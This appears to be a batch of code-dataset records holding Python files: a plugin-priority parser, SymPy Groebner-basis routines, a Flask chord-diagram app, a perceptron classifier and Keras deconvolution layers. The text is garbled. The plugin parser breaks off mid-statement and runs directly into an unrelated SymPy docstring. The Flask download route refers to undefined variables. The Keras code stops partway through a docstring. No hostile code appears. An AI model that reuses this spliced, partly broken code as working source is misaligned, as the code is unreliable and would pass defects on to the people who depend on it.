+{"seq_id":"492125369","text":"import glob\nimport os\nfrom logs import logs as log\nlogs=log()\ndef qparse(questionlist):\n\tdef checkdicts(checkvar, plugin):\n\t\tplugvals=plugin.values()[0]\n\t\tfor plugdict in plugvals:\n\t\t\tlogs.write(\"Checking dictionary {0}\".format(plugdict),'trying')\n\t\t\tif plugdict.keys()[0]==checkvar:\n\t\t\t\tlogs.write(\"Found {0} dictionary\".format(checkvar), 'success')\n\t\t\t\tcheckval=plugdict.values()[0]\n\t\t\t\treturn checkval\n\tlogs.write(\"Parsing possible plugins\", 'trying')\n\tpriority=open('priority.txt').read().split('\\n')\n\tprioritized=[]\n\tfor plugin in questionlist:\n\t\tplugname=plugin.keys()[0]\n\t\tlogs.write(\"Checking plugin {0}\".format(plugname), 'working')\n\t\tlogs.write(\"Checking to see if the plugin is in the priority list\", 'working')\n\t\tplugname=plugin.keys()[0]\n\t\tfor line in priority:\n\t\t\tname=line.split(':')[1]\n\t\t\tstatus=line.split(':')[0]\n\t\t\tlogs.write('Item {0} in priority list is {1}'.format(status, name), 'working')\n\t\t\tif plugname.lower()==name.lower():\n\t\t\t\tlogs.write(\"Plugin name and priority list item match\", 'success')\n\t\t\t\tprioritized.append({status:plugin})\n\tlogs.write(\"Going through list of prioritized plugins\", 'trying')\n\tlogs.write(prioritized, 'working')\n\tnum=None\n\tfor plugin in prioritized:\n\t\tlogs.write(\"Looking at plugin {0}\".format(plugin), 'working')\n\t\tstatus=plugin.keys()[0]\n\t\tplugname=plugin.values()[0].keys()[0]\n\t\tlogs.write(\"Plugin {0} has priority {1}\".format(plugname,status), 'working')\n\t\tstatus=int(status)\n\t\tif num==None:\n\t\t\tnum=status\n\t\telse:\n\t\t\tif status>> from sympy.abc import x, y\r\n >>> from sympy import groebner\r\n\r\n >>> F = [x**2 - 3*y - x + 1, y**2 - 2*x + y - 1]\r\n >>> G = groebner(F, x, y, order='grlex')\r\n\r\n >>> list(G.fglm('lex'))\r\n [2*x - y**2 - y + 1, y**4 + 2*y**3 - 3*y**2 - 16*y + 7]\r\n >>> list(groebner(F, x, y, order='lex'))\r\n [2*x - y**2 - y + 1, y**4 + 2*y**3 - 3*y**2 - 16*y + 7]\r\n\r\n References\r\n ==========\r\n\r\n J.C. Faugere, P. Gianni, D. Lazard, T. Mora (1994). Efficient\r\n Computation of Zero-dimensional Groebner Bases by Change of\r\n Ordering\r\n\r\n \"\"\"\r\n opt = self._options\r\n\r\n src_order = opt.order\r\n dst_order = monomial_key(order)\r\n\r\n if src_order == dst_order:\r\n return self\r\n\r\n if not self.is_zero_dimensional:\r\n raise NotImplementedError(\"can't convert Groebner bases of ideals with positive dimension\")\r\n\r\n polys = list(self._basis)\r\n domain = opt.domain\r\n\r\n opt = opt.clone(dict(\r\n domain=domain.get_field(),\r\n order=dst_order,\r\n ))\r\n\r\n from sympy.polys.rings import xring\r\n _ring, _ = xring(opt.gens, opt.domain, src_order)\r\n\r\n for i, poly in enumerate(polys):\r\n poly = poly.set_domain(opt.domain).rep.to_dict()\r\n polys[i] = _ring.from_dict(poly)\r\n\r\n G = matrix_fglm(polys, _ring, dst_order)\r\n G = [Poly._from_dict(dict(g), opt) for g in G]\r\n\r\n if not domain.is_Field:\r\n G = [g.clear_denoms(convert=True)[1] for g in G]\r\n opt.domain = domain\r\n\r\n return self._new(G, opt)\r\n\r\n def reduce(self, expr, auto=True):\r\n \"\"\"\r\n Reduces a polynomial modulo a Groebner basis.\r\n\r\n Given a polynomial ``f`` and a set of polynomials ``G = (g_1, ..., g_n)``,\r\n computes a set of quotients ``q = (q_1, ..., q_n)`` and the remainder ``r``\r\n such that ``f = q_1*f_1 + ... 
+ q_n*f_n + r``, where ``r`` vanishes or ``r``\r\n is a completely reduced polynomial with respect to ``G``.\r\n\r\n Examples\r\n ========\r\n\r\n >>> from sympy import groebner, expand\r\n >>> from sympy.abc import x, y\r\n\r\n >>> f = 2*x**4 - x**2 + y**3 + y**2\r\n >>> G = groebner([x**3 - x, y**3 - y])\r\n\r\n >>> G.reduce(f)\r\n ([2*x, 1], x**2 + y**2 + y)\r\n >>> Q, r = _\r\n\r\n >>> expand(sum(q*g for q, g in zip(Q, G)) + r)\r\n 2*x**4 - x**2 + y**3 + y**2\r\n >>> _ == f\r\n True\r\n\r\n \"\"\"\r\n poly = Poly._from_expr(expr, self._options)\r\n polys = [poly] + list(self._basis)\r\n\r\n opt = self._options\r\n domain = opt.domain\r\n\r\n retract = False\r\n\r\n if auto and domain.is_Ring and not domain.is_Field:\r\n opt = opt.clone(dict(domain=domain.get_field()))\r\n retract = True\r\n\r\n from sympy.polys.rings import xring\r\n _ring, _ = xring(opt.gens, opt.domain, opt.order)\r\n\r\n for i, poly in enumerate(polys):\r\n poly = poly.set_domain(opt.domain).rep.to_dict()\r\n polys[i] = _ring.from_dict(poly)\r\n\r\n Q, r = polys[0].div(polys[1:])\r\n\r\n Q = [Poly._from_dict(dict(q), opt) for q in Q]\r\n r = Poly._from_dict(dict(r), opt)\r\n\r\n if retract:\r\n try:\r\n _Q, _r = [q.to_ring() for q in Q], r.to_ring()\r\n except CoercionFailed:\r\n pass\r\n else:\r\n Q, r = _Q, _r\r\n\r\n if not opt.polys:\r\n return [q.as_expr() for q in Q], r.as_expr()\r\n else:\r\n return Q, r\r\n\r\n\r\n def contains(self, poly):\r\n \"\"\"\r\n Check if ``poly`` belongs the ideal generated by ``self``.\r\n\r\n Examples\r\n ========\r\n\r\n >>> from sympy import groebner\r\n >>> from sympy.abc import x, y\r\n\r\n >>> f = 2*x**3 + y**3 + 3*y\r\n >>> G = groebner([x**2 + y**2 - 1, x*y - 2])\r\n\r\n >>> G.contains(f)\r\n True\r\n >>> G.contains(f + 1)\r\n False\r\n\r\n \"\"\"\r\n return self.reduce(poly)[1] == 0\r\n\r\ndef iter_groebner(seq,n, ring, method=None):\r\n \"\"\"\r\n Computes Groebner basis for a set of polynomials in `K[X]`.\r\n\r\n Wrapper around the (default) improved Buchberger and the other algorithms\r\n for computing Groebner bases. 
The choice of algorithm can be changed via\r\n ``method`` argument or :func:`setup` from :mod:`sympy.polys.polyconfig`,\r\n where ``method`` can be either ``buchberger`` or ``f5b``.\r\n\r\n \"\"\"\r\n\r\n domain, orig = ring.domain, None\r\n if not domain.is_Field or not domain.has_assoc_Field:\r\n try:\r\n orig, ring = ring, ring.clone(domain=domain.get_field())\r\n except DomainError:\r\n raise DomainError(\"can't compute a Groebner basis over %s\" % domain)\r\n else:\r\n seq = [ s.set_ring(ring) for s in seq ]\r\n\r\n G = _incr_buch(seq,n, ring)\r\n\r\n if orig is not None:\r\n G = [ g.clear_denoms()[1].set_ring(orig) for g in G ]\r\n\r\n return G\r\n\r\ndef _incr_buch(f,n, ring):\r\n \"\"\"\r\n Incremental Computation of a reduced Grobner basis, given that f[:-1] is a reduced Grobner basis\r\n and f[-1] is a new polynomial to add into the basis.\r\n New polynomial f[-1] is assumed to be reduced by the grobner basis f[:-1] already.\r\n\r\n \"\"\"\r\n order = ring.order\r\n domain = ring.domain\r\n\r\n monomial_mul = ring.monomial_mul\r\n monomial_div = ring.monomial_div\r\n monomial_lcm = ring.monomial_lcm\r\n\r\n def select(P):\r\n # normal selection strategy\r\n # select the pair with minimum LCM(LM(f), LM(g))\r\n pr = min(P, key=lambda pair: order(monomial_lcm(f[pair[0]].LM, f[pair[1]].LM)))\r\n return pr\r\n\r\n def normal(g, J):\r\n h = g.rem([ f[j] for j in J ])\r\n\r\n if not h:\r\n return None\r\n else:\r\n h = h.monic()\r\n\r\n if not h in I:\r\n I[h] = len(f)\r\n f.append(h)\r\n\r\n return h.LM, I[h]\r\n\r\n def update(G, B, ih):\r\n # update G using the set of critical pairs B and h\r\n # [BW] page 230\r\n h = f[ih]\r\n mh = h.LM\r\n\r\n # filter new pairs (h, g), g in G\r\n C = G.copy()\r\n D = set()\r\n\r\n while C:\r\n # select a pair (h, g) by popping an element from C\r\n ig = C.pop()\r\n g = f[ig]\r\n mg = g.LM\r\n LCMhg = monomial_lcm(mh, mg)\r\n\r\n def lcm_divides(ip):\r\n # LCM(LM(h), LM(p)) divides LCM(LM(h), LM(g))\r\n m = monomial_lcm(mh, f[ip].LM)\r\n return monomial_div(LCMhg, m)\r\n\r\n # HT(h) and HT(g) disjoint: mh*mg == LCMhg\r\n if monomial_mul(mh, mg) == LCMhg or (\r\n not any(lcm_divides(ipx) for ipx in C) and\r\n not any(lcm_divides(pr[1]) for pr in D)):\r\n D.add((ih, ig))\r\n\r\n E = set()\r\n\r\n while D:\r\n # select h, g from D (h the same as above)\r\n ih, ig = D.pop()\r\n mg = f[ig].LM\r\n LCMhg = monomial_lcm(mh, mg)\r\n\r\n if not monomial_mul(mh, mg) == LCMhg:\r\n E.add((ih, ig))\r\n\r\n # filter old pairs\r\n B_new = set()\r\n\r\n while B:\r\n # select g1, g2 from B (-> CP)\r\n ig1, ig2 = B.pop()\r\n mg1 = f[ig1].LM\r\n mg2 = f[ig2].LM\r\n LCM12 = monomial_lcm(mg1, mg2)\r\n\r\n # if HT(h) does not divide lcm(HT(g1), HT(g2))\r\n if not monomial_div(LCM12, mh) or \\\r\n monomial_lcm(mg1, mh) == LCM12 or \\\r\n monomial_lcm(mg2, mh) == LCM12:\r\n B_new.add((ig1, ig2))\r\n\r\n B_new |= E\r\n\r\n # filter polynomials\r\n G_new = set()\r\n\r\n while G:\r\n ig = G.pop()\r\n mg = f[ig].LM\r\n\r\n if not monomial_div(mg, mh):\r\n G_new.add(ig)\r\n\r\n G_new.add(ih)\r\n\r\n return G_new, B_new\r\n # end of update ################################\r\n\r\n if not f:\r\n return []\r\n f1 = [func for func in f[:-n]]\r\n for p in f[-n:]:\r\n r = p.rem(f1)\r\n if r != 0:\r\n f1.append(r)\r\n f = f1\r\n I = {} # ip = I[p]; p = f[ip]\r\n F = set()\r\n G = set() # set of indices of intermediate would-be Groebner basis\r\n CP = set() # set of pairs of indices of critical pairs\r\n\r\n for i, h in enumerate(f):\r\n I[h] = i #Setup polynomial-index dictionary\r\n 
if i >= len(f)-n:\r\n F.add(i)\r\n else:\r\n G.add(i)\r\n \r\n #####################################\r\n # algorithm GROEBNERNEWS2 in [BW] page 232\r\n while F:\r\n # select p with minimum monomial according to the monomial ordering\r\n h = min([f[x] for x in F], key=lambda f: order(f.LM))\r\n ih = I[h]\r\n F.remove(ih)\r\n G, CP = update(G, CP, ih)\r\n\r\n # count the number of critical pairs which reduce to zero\r\n reductions_to_zero = 0\r\n\r\n while CP:\r\n ig1, ig2 = select(CP)\r\n CP.remove((ig1, ig2))\r\n \r\n h = spoly(f[ig1], f[ig2], ring)\r\n # ordering divisors is on average more efficient [Cox] page 111\r\n G1 = sorted(G, key=lambda g: order(f[g].LM))\r\n ht = normal(h, G1)\r\n\r\n if ht:\r\n G, CP = update(G, CP, ht[1])\r\n else:\r\n reductions_to_zero += 1\r\n\r\n ######################################\r\n # now G is a Groebner basis; reduce it\r\n Gr = set()\r\n\r\n for ig in G:\r\n ht = normal(f[ig], G - set([ig]))\r\n\r\n if ht:\r\n Gr.add(ht[1])\r\n\r\n Gr = [f[ig] for ig in Gr]\r\n\r\n # order according to the monomial ordering\r\n Gr = sorted(Gr, key=lambda f: order(f.LM), reverse=True)\r\n\r\n return Gr\r\n\r\nimport numpy as np\r\nfrom math import floor\r\nimport time\r\nfrom itertools import product\r\nfrom itertools import combinations\r\nfrom sympy import Matrix, var\r\n\r\ndef make_linearEqns(A,z):\r\n #Takes matrix A and variable list z and converts it into a list of linear equations\r\n zmat = Matrix(z)\r\n A = Matrix(A)\r\n A = A.rref()[0]\r\n lin_fcns = A*zmat\r\n lin_fcns = [f for f in lin_fcns if f != 0]\r\n lin_fcns = lin_fcns[::-1]\r\n return(list(lin_fcns))\r\n\r\ndef hypercube_matrix(R):\r\n A = np.zeros((len(R),len(R[0])))\r\n for i,r in enumerate(R):\r\n for j,letter in enumerate(r):\r\n if letter == '0':\r\n A[i,j] = -1\r\n else:\r\n A[i,j] = int(letter)\r\n return(A)\r\n\r\ndef hypercube_polys(k):\r\n variable_string = ''\r\n num_digits = len(str(k))\r\n for i in range(0,k):\r\n count = str(i+1).zfill(num_digits)\r\n variable = ',z'+count\r\n variable_string = variable_string +variable\r\n variable_string = variable_string[1:]\r\n z = var(variable_string)\r\n P = []\r\n f = 0\r\n for i in range(k):\r\n P.append(z[i]*(z[i]-1)*(z[i]+1))\r\n f = f + z[i]**2\r\n fs = []\r\n for i in range(floor(k/2)):\r\n fi = f-2*(i+1)\r\n fs.append(fi)\r\n return(P,fs,z)\r\n\r\ndef check_hcube_resolving(R,k):\r\n #Create matrix A from R\r\n A = hypercube_matrix(R)\r\n #Get pre-computed Groebner basis and variables for H_k,2\r\n G,fs,z = hypercube_polys(k)\r\n #Get linear functions from A matrix\r\n lin_fcns = make_linearEqns(A,z)\r\n n = len(lin_fcns)\r\n #Get Grobner basis of P and linear functions\r\n G = groebnerbasis(True,G+lin_fcns,n,order = 'lex')\r\n for i,fi in enumerate(fs):\r\n #Compute Grobner basis of G+fi\r\n Gi = groebnerbasis(True,list(G)+[fi],1,order = 'lex')\r\n #Solutions iff Gi neq 1, if Gi neq 1 then R is not resolving\r\n if not (list(Gi) == [1]):\r\n return False\r\n return True","sub_path":"Lucas/Generate Resolving Sets/helper_funcs.py","file_name":"helper_funcs.py","file_ext":"py","file_size_in_byte":17829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
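+A minimal sketch of driving `iter_groebner` from the record above (helper_funcs.py); the polynomials are arbitrary, and `n` counts the trailing polynomials treated as new additions to an already reduced basis.
+
+```python
+from sympy import QQ
+from sympy.polys.orderings import lex
+from sympy.polys.rings import ring
+
+from helper_funcs import iter_groebner  # module name assumed from the record's sub_path
+
+R, x, y = ring("x,y", QQ, lex)
+base = [x**2 + y**2 - 1, x*y - 2]   # assumed to already be a reduced Groebner basis
+new = [x**3 + y]                    # polynomial added incrementally
+G = iter_groebner(base + new, len(new), R)
+print(G)
+```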
+{"seq_id":"216736607","text":"from flask import (\n render_template,\n request,\n Blueprint,\n make_response\n )\n\nfrom diagram import MultiFingerChord\nfrom .forms import ChordForm, DownloadForm\n\nimport cairosvg\nfrom wand.image import Image\n\nimport yaml\n\nfrom .config import DEFAULT_STYLE\n\nmy_view = Blueprint('my_view', __name__)\n\n@my_view.route('/', methods=['GET', 'POST'])\ndef home():\n def create_diagram(chord_form):\n \"\"\"Create chord diagram and return filename.\"\"\"\n extras = [\n dict(\n zip(['string', 'fret', 'finger'], x.split(',')[:3])\n )\n for x in chord_form.extras.data.splitlines()\n ]\n\n chord_style = DEFAULT_STYLE\n\n chord_style['drawing']['label_all_frets'] = chord_form.label_all.data\n print(chord_style)\n\n\n diagram = MultiFingerChord(\n positions=chord_form.positions.data,\n fingers=chord_form.fingers.data,\n barre=chord_form.barre.data,\n title=chord_form.title.data,\n style=chord_style,\n extras=extras\n )\n\n # This is obviously dumb, but works for now\n filename = 'static/ukulele/{title}_{pos}_{fin}_{bar}.svg'.format(\n title=chord_form.title.data,\n pos=chord_form.positions.data,\n fin=chord_form.fingers.data,\n bar=chord_form.barre.data,\n )\n diagram.save(filename)\n\n return filename\n\n chord_form = ChordForm(request.form)\n dl_form = DownloadForm(request.form)\n\n if request.method == 'POST':\n # Diagram\n if chord_form.validate_on_submit():\n return render_template(\n 'index.html',\n diagram=create_diagram(chord_form),\n chord_form=chord_form,\n dl_form=dl_form\n )\n\n return render_template(\n 'index.html',\n diagram=create_diagram(chord_form),\n chord_form=chord_form,\n dl_form=dl_form\n )\n\n@my_view.route('/download', methods=['POST'])\ndef download_as():\n if request.method == 'POST':\n if format == 'png_t':\n # convert using cairosvg\n result = cairosvg.svg2png(imgdata)\n elif format == 'png':\n i = wand.image.Image(blob=imgdata)\n result = i.convert('png').make_blob()\n else:\n result = imgdata\n\n return send_file(io.BytesIO(imgdata), as_attachment=True, filename='chord.svg')\n\n@my_view.route('/api/v1/chord/', methods=['POST'])\ndef generate_chord():\n \"\"\"\n process the request body and return SVG content (no XML header)\n \"\"\"\n content = request.get_json(silent=True)\n chordobj = MultiFingerChord(\n positions=content.get('positions', '0000'),\n fingers=content.get('fingers','----'),\n barre=content.get('barre', None),\n title=content.get('title', 'Am7'),\n extras=content.get('extras', None),\n style=chord_style\n ).render()\n chordobj.seek(0)\n header, data = chordobj.read().splitlines()\n\n # export type\n fmt = content.get('format', 'svg')\n\n if fmt != 'svg':\n content_type = 'image/png'\n ext = 'png'\n else:\n content_type = 'image/svg+xml'\n ext = 'svg'\n\n # OK, we have a chord object, let's return it\n if fmt == 'png_t':\n # do cairo stuff\n data = cairosvg.svg2png(bytestring=data.encode('utf-8'))\n\n if fmt == 'png':\n with Image(blob=data.encode('utf-8')) as i:\n data = i.convert('png').make_blob()\n\n response = make_response(data)\n response.headers.set('Content-Type', content_type)\n response.headers.set('Content-Disposition', 'attachment', filename=\"{}.{}\".format(content.get('title'), ext))\n\n return response\n\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"183406928","text":"import argparse\nimport pprint\nimport numpy as np\nfrom nbc import read_data, zero_one_loss\nimport crossv\nimport matplotlib.pyplot as plt\nimport pylab\n\ndef define_attr(data):\n\tattr = data[0][1:]\n\tnum_rows = len(data)\n\tnum_attr = len(attr)\n\tattr_value_dict = {}\n\n\tfor i in range(num_attr):\n\t\tattr_values = [data[j][i + 1] for j in range(1,num_rows)]\n\t\tvalues = set(attr_values)\n\t\tattr_value_dict[attr[i]] = dict([(key, value) for value, key in enumerate(values, 1)])\n\n\treturn attr_value_dict\n\ndef transform_data(data, value_dict):\n\tattr = data[0][1:]\n\tnum_rows = len(data)\n\tnum_attr = len(attr)\n\n\tfor i in range(1,num_rows):\n\t\tdata[i][0] = 0 if data[i][0] == '0' else 1\n\t\tfor j in range(num_attr):\n\t\t\t'''try:\n\t\t\t\tdata[i][j] = float(data[i][j].strip())\n\t\t\texcept Exception as e:'''\n\t\t\tdata[i][j + 1] = value_dict[attr[j]][data[i][j + 1]]\n\n\treturn data\n\ndef predict(data, weights, bias):\n\t# data = np.array(data)\n\t# print data\n\tprediction = []\n\tproduct = data.dot(weights)\n\t# print product\n\t#prediction = 1 if product > -1*bias else 0\n\tfor i in np.nditer(product):\n\t\tprediction.append(1 if i > -1*bias else 0)\n\treturn prediction\n\ndef training(train_data, true_class, alpha, T):\n\tnum_attr = len(train_data[0])\n\tweights = np.zeros(num_attr)\n\tbias = 0\n\t\n\tfor e in range(T):\n\t\twrong = 0\n\t\tfor row_num in range(train_data.shape[0]):\n\t\t\t#print \"initial weights:\", weights\n\t\t\tprediction = predict(train_data[row_num], weights, bias)\n\t\t\t# print prediction\n\t\t\t# print true_class[row_num]\n\t\t\tif prediction[0] != true_class[row_num]:\n\t\t\t\t# bias += alpha * error\n\t\t\t\twrong += 1\n\t\t\t\tchange = np.multiply(alpha * (true_class[row_num]-prediction[0]), train_data[row_num])\n\t\t\t\t# print change\n\t\t\t\tweights = np.add(weights, change)\n\t\t\t\tbias += alpha * (true_class[row_num]-prediction[0])\n\t\t\t# prediction = predict(train_data[row_num], weights, bias)\n\t\t\t# print prediction, \"\\n\"\n\t\t\t#print \"updated weights:\", weights\n\t\t# print \"error rate\", float(wrong)/train_data.shape[0]\n\treturn weights\n\ndef make_matrix(train_data):\n\tvalue_dict = define_attr(train_data)\n\ttrans_data = transform_data(train_data, value_dict)\n\ttrans_data.pop(0)\n\ttrue_class = [data_row.pop(0) for data_row in trans_data]\n\n\tdata_mat = np.array(trans_data)\n\treturn data_mat, true_class\n\n\ndef extract_weights(train_data):\n\tdata_mat, true_class = make_matrix(train_data)\n\t#predict(data_mat, None, None)\n\n\treturn training(data_mat, true_class, 0.5, 100)\n\n\ndef main():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"datafile\", help=\"data file (yelp2.csv)\", default=None)\n\targs = parser.parse_args()\n\n\tif args.datafile == None: raise Exception(\"The data file is not found\")\n\n\t# train_data = read_data(args.training)\n\n\t# extract_weights(train_data)\n\n\ttraining_set, test_set = crossv.split_data(args.datafile)\n\tresult = crossv.validation(training_set, test_set)\n\n\tresult_p = crossv.validation(training_set, test_set, \"perceptron\")\n\n # pprint.pprint(result)\n\tx_axis = result.keys()\n\tx_axis.sort()\n\n\tzero_one_nbc = []\n\n\tzero_one_perceptron = []\n # square_perceptron = []\n\n\tbaseline = []\n\n\tfor index in x_axis:\n\t\tzero_one_nbc.append(result[index][0])\n\t\tbaseline.append(result[index][2])\n\t\tzero_one_perceptron.append(result_p[index])\n\tpylab.plot(x_axis, zero_one_nbc, label=\"nbc\")\n\tpylab.plot(x_axis, 
zero_one_perceptron, label=\"perceptron\")\n\tpylab.plot(x_axis, baseline, label=\"baseline\")\n\tpylab.legend(loc='upper left')\n\tpylab.show()\n\t# value_dict = define_attr(train_data)\n\t# trans_data = transform_data(train_data, value_dict)\n\t# trans_data.pop(0)\n\t# true_class = [data_row.pop(0) for data_row in trans_data]\n\n\t# data_mat = np.array(trans_data)\n\t# #predict(data_mat, None, None)\n\n\t# weights = training(data_mat, true_class, 2, 1000)\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"hw3/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
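+A toy run of the training/predict pair above on a linearly separable OR dataset, assuming the module imports as `perceptron`; note that `training()` learns a bias internally but only returns the weights, so the zero bias passed to `predict()` here is an assumption.
+
+```python
+import numpy as np
+from perceptron import predict, training
+
+X = np.array([[0, 0], [0, 1], [1, 0], [1, 1]])
+y = [0, 1, 1, 1]  # logical OR, separable through the origin
+w = training(X, y, 0.5, 10)
+print(predict(X, w, 0))  # ideally [0, 1, 1, 1]; the discarded bias may shift this
+```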
+{"seq_id":"614642459","text":"import numpy as np\n\nfrom keras.layers import (\n Input,\n Dense)\nfrom keras.layers.convolutional import (\n Convolution2D)\nfrom keras import backend as K\n\n\nclass DLayer:\n def __init__(self, layer):\n self.layer = layer\n self.up_data = None\n self.down_data = None\n self.up_func = None\n self.down_func = None\n\n def up(self, data, learning_phase=0):\n \"\"\"\n function to compute activation in forward pass\n # Arguments\n data: Data to be operated in forward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n Activation\n \"\"\"\n data = self.up_func([data, learning_phase])\n self.up_data = data if K.backend() == 'theano' else data[0]\n return self.up_data\n\n def down(self, data, learning_phase=0):\n \"\"\"\n function to compute activation in backward pass\n # Arguments\n data: Data to be operated in backward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n Activation\n \"\"\"\n data = self.down_func([data, learning_phase])\n self.down_data = data if K.backend() == 'theano' else data[0]\n return self.down_data\n\n\nclass DConvolution2D(DLayer):\n \"\"\"\n A class to define forward and backward operation on Convolution2D\n \"\"\"\n\n def __init__(self, layer):\n \"\"\"\n # Arguments\n layer: an instance of Convolution2D layer, whose configuration\n will be used to initiate DConvolution2D(input_shape,\n output_shape, weights)\n \"\"\"\n super(DConvolution2D, self).__init__(layer)\n\n weights = layer.get_weights()\n W = weights[0]\n b = weights[1]\n\n # Set up_func for DConvolution2D\n input = Input(shape=layer.input_shape[1:])\n\n output = Convolution2D(\n nb_filter=layer.nb_filter,\n nb_row=layer.nb_row,\n nb_col=layer.nb_col,\n border_mode=layer.border_mode,\n weights=[W, b]\n )(input)\n self.up_func = _K_function([input, K.learning_phase()], output)\n\n # Flip W horizontally and vertically,\n # and set down_func for DConvolution2D\n if K.image_dim_ordering() == 'th':\n W = np.transpose(W, (1, 0, 2, 3))\n W = W[:, :, ::-1, ::-1]\n nb_down_filter = W.shape[0]\n nb_down_row = W.shape[2]\n nb_down_col = W.shape[3]\n else:\n W = np.transpose(W, (0, 1, 3, 2))\n W = W[::-1, ::-1, :, :]\n nb_down_filter = W.shape[3]\n nb_down_row = W.shape[0]\n nb_down_col = W.shape[1]\n b = np.zeros(nb_down_filter)\n input = Input(shape=layer.output_shape[1:])\n output = Convolution2D(\n nb_filter=nb_down_filter,\n nb_row=nb_down_row,\n nb_col=nb_down_col,\n border_mode='same',\n weights=[W, b]\n )(input)\n self.down_func = _K_function([input, K.learning_phase()], output)\n\n\nclass DDense(DLayer):\n \"\"\"\n A class to define forward and backward operation on Dense\n \"\"\"\n\n def __init__(self, layer):\n \"\"\"\n # Arguments\n layer: an instance of Dense layer, whose configuration\n will be used to initiate DDense(input_shape,\n output_shape, weights)\n \"\"\"\n super(DDense, self).__init__(layer)\n weights = layer.get_weights()\n W = weights[0]\n b = weights[1]\n\n # Set up_func for DDense\n input = Input(shape=layer.input_shape[1:])\n output = Dense(output_dim=layer.output_shape[1],\n weights=[W, b])(input)\n self.up_func = _K_function([input, K.learning_phase()], output)\n\n # Transpose W and set down_func for DDense\n W = W.transpose()\n self.input_shape = layer.input_shape\n self.output_shape = layer.output_shape\n b = np.zeros(self.input_shape[1])\n flipped_weights = [W, b]\n input = Input(shape=self.output_shape[1:])\n output = Dense(\n output_dim=self.input_shape[1],\n weights=flipped_weights)(input)\n self.down_func = 
_K_function([input, K.learning_phase()], output)\n\n\nclass DPooling(DLayer):\n \"\"\"\n A class to define forward and backward operation on Pooling\n \"\"\"\n\n def __init__(self, layer):\n \"\"\"\n # Arguments\n layer: an instance of Pooling layer, whose configuration\n will be used to initiate DPooling(input_shape,\n output_shape, weights)\n \"\"\"\n super(DPooling, self).__init__(layer)\n self.poolsize = layer.pool_size\n\n def up(self, data, learning_phase=0):\n \"\"\"\n function to compute pooling output in forward pass\n # Arguments\n data: Data to be operated in forward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n Pooled result\n \"\"\"\n [self.up_data, self.switch] = \\\n self.__max_pooling_with_switch(data, self.poolsize)\n return self.up_data\n\n def down(self, data, learning_phase=0):\n \"\"\"\n function to compute unpooling output in backward pass\n # Arguments\n data: Data to be operated in forward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n Unpooled result\n \"\"\"\n self.down_data = self.__max_unpooling_with_switch(data, self.switch)\n return self.down_data\n\n def __max_pooling_with_switch(self, input, poolsize):\n \"\"\"\n Compute pooling output and switch in forward pass, switch stores\n location of the maximum value in each poolsize * poolsize block\n # Arguments\n input: data to be pooled\n poolsize: size of pooling operation\n # Returns\n Pooled result and Switch\n \"\"\"\n switch = np.zeros(input.shape)\n\n if K.image_dim_ordering() == 'th':\n samples, dims, rows, cols = input.shape\n else:\n samples, rows, cols, dims = input.shape\n\n row_poolsize = int(poolsize[0])\n col_poolsize = int(poolsize[1])\n rows = rows // row_poolsize\n cols = cols // col_poolsize\n\n if K.image_dim_ordering() == 'th':\n out_shape = samples, dims, rows, cols\n else:\n out_shape = samples, rows, cols, dims\n\n pooled = np.zeros(out_shape)\n\n for sample in range(samples):\n for dim in range(dims):\n for row in range(rows):\n for col in range(cols):\n if K.image_dim_ordering() == 'th':\n patch = input[sample,\n dim,\n row * row_poolsize: (row + 1) * row_poolsize,\n col * col_poolsize: (col + 1) * col_poolsize]\n max_value = patch.max()\n pooled[sample, dim, row, col] = max_value\n else:\n patch = input[sample,\n row * row_poolsize: (row + 1) * row_poolsize,\n col * col_poolsize: (col + 1) * col_poolsize,\n dim]\n max_value = patch.max()\n pooled[sample, row, col, dim] = max_value\n\n max_col_index = patch.argmax(axis=1)\n max_cols = patch.max(axis=1)\n max_row = max_cols.argmax()\n max_col = max_col_index[max_row]\n if K.image_dim_ordering() == 'th':\n switch[sample,\n dim,\n row * row_poolsize + max_row,\n col * col_poolsize + max_col] = 1\n else:\n switch[sample,\n row * row_poolsize + max_row,\n col * col_poolsize + max_col,\n dim] = 1\n\n return [pooled, switch]\n\n # Compute unpooled output using pooled data and switch\n def __max_unpooling_with_switch(self, input, switch):\n \"\"\"\n Compute unpooled output using pooled data and switch\n # Arguments\n input: data to be pooled\n poolsize: size of pooling operation\n switch: switch storing location of each elements\n # Returns\n Unpooled result\n \"\"\"\n if K.image_dim_ordering() == 'th':\n row_i, col_i = 2, 3\n else:\n row_i, col_i = 1, 2\n\n tile = np.ones((switch.shape[row_i] // input.shape[row_i],\n switch.shape[col_i] // input.shape[col_i]))\n\n if K.image_dim_ordering() == 'th':\n out = np.kron(input, tile)\n else:\n out = np.kron(np.transpose(input, (0, 3, 1, 2)), tile)\n out = 
np.transpose(out, (0, 2, 3, 1))\n\n unpooled = out * switch\n return unpooled\n\n\nclass DActivation(DLayer):\n \"\"\"\n A class to define forward and backward operation on Activation\n \"\"\"\n\n def __init__(self, layer, linear=False):\n \"\"\"\n # Arguments\n layer: an instance of Activation layer, whose configuration\n will be used to initiate DActivation(input_shape,\n output_shape, weights)\n \"\"\"\n super(DActivation, self).__init__(layer)\n self.linear = linear\n self.activation = layer.activation\n input = K.placeholder(shape=layer.output_shape)\n\n output = self.activation(input)\n # According to the original paper,\n # In forward pass and backward pass, do the same activation(relu)\n self.up_func = _K_function(\n [input, K.learning_phase()], output)\n self.down_func = _K_function(\n [input, K.learning_phase()], output)\n\n\nclass DFlatten(DLayer):\n \"\"\"\n A class to define forward and backward operation on Flatten\n \"\"\"\n\n def __init__(self, layer):\n \"\"\"\n # Arguments\n layer: an instance of Flatten layer, whose configuration\n will be used to initiate DFlatten(input_shape,\n output_shape, weights)\n \"\"\"\n super(DFlatten, self).__init__(layer)\n self.shape = layer.input_shape[1:]\n self.up_func = _K_function(\n [layer.input, K.learning_phase()], layer.output)\n\n def down(self, data, learning_phase=0):\n \"\"\"\n function to unflatten input in backward pass\n # 